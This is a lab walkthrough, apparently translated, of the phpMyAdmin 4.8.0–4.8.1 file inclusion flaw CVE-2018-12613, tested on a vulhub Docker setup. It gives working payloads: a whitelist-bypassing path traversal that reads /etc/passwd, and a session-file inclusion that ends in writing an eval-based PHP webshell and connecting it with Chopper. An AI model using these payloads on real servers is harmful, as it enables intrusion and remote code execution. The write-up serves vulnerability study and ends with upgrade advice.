table of Contents
Vulnerability description
A problem was discovered in phpMyAdmin 4.8.x before 4.8.2 in which an attacker could include (view and possibly execute) files on the server. The vulnerability comes from page redirection and part of the code loaded in phpMyAdmin, as well as incorrect testing of whitelisted pages. Except for the "$cfg ['AllowArbitraryServer'] = true" situation (the attacker can specify any host he/she has controlled and execute arbitrary code on phpMyAdmin), the attacker must also be authenticated. ['ServerDefault'] = 0" (bypassing the login requirement and running vulnerable code without any authentication).
Impact version
phpMyAdmin 4.8.0 and 4.8.1
Vulnerability environment construction
Use vulhub to directly docker start the environment with one key CVE-2018-12613 environment
Docker quick start and vulnerability environment construction
After downloading and installing vulhub, enter the /phpmyadmin/CVE-2018-12613directory and execute the following command to start the environment
sudo docker-compose up -d
Check the current virtual machine ip and visit port 8080, then the phpmyadmin page will appear
Vulnerability analysis
Look index.phpat line 61, there is an include file containing functions
- Determine whether the target exists
- Determine whether target is a string
- target cannot start with the index string
- targer is not in the $target_blacklist array
- Bring the targer to the checkPageValidity method of the Core class
$target_blacklisThe array is the following two file names:
View the libraries/classes/Core.phpfile, view line 443, analysis checkPageValiditymethod usage:
You can view $whiltlistwhich variables are stored in the array on line 25 :
Go back to the checkPageValiditymethod and mainly check the following code:
$_page = mb_substr(
$page,
0,
mb_strpos($page . '?', '?')
);
if (in_array($_page, $whitelist)) {
return true;
}
This code will intercept target变量the characters from the beginning to the ?middle of the string, and then bring them into the $whitelist array to match. If the match is successful, it returns true.
Construct the payload:
?target=sql.php?/../../../../../../../../../etc/passwd
Can successfully include passwd file
Exploit
The current docker environment built by vulhub cannot be used to write Trojan horses to the database and then include frm files. Because vulhub uses the method of separating the site and database, we insert the Trojan into a table, and the payload will be stored in the database system instead of the web server.
So we use the session to write the shell to getshell
Execute sql statement:
SELECT "<?php phpinfo();?>"
Check our session, the php code we entered has actually been saved in the server.
We enter the docker container and view the tmpfiles under the web server , which exist in our session file
Cat viewing the session file can see the php code we just queried:
# cat <session文件>
cat sess_7600504195960fdd23197b847708a866
We use the payload to try to include the session file, and phpinfo appears.
/index.php?target=sql.php?/../../../../../../../../../tmp/sess_7600504195960fdd23197b847708a866
Search from phpinfo to CONTEXT_DOCUMENT_ROOTview the web path
Write to webshell:
select "<?php file_put_contents('/var/www/html/cmd.php','<?php @eval($_POST[pass]);?>')?>"
Then include the session file again
/index.php?target=sql.php?/../../../../../../../../../tmp/sess_3ac44a735bf3546cbbb3aabb00da9322
Visit cmd.php and find that the file already exists, indicating that we have written successfully.
Add Trojan address and password to Chopper
Vulnerability hardening
Upgrade to the latest version of phpmyadmin without affecting business operation.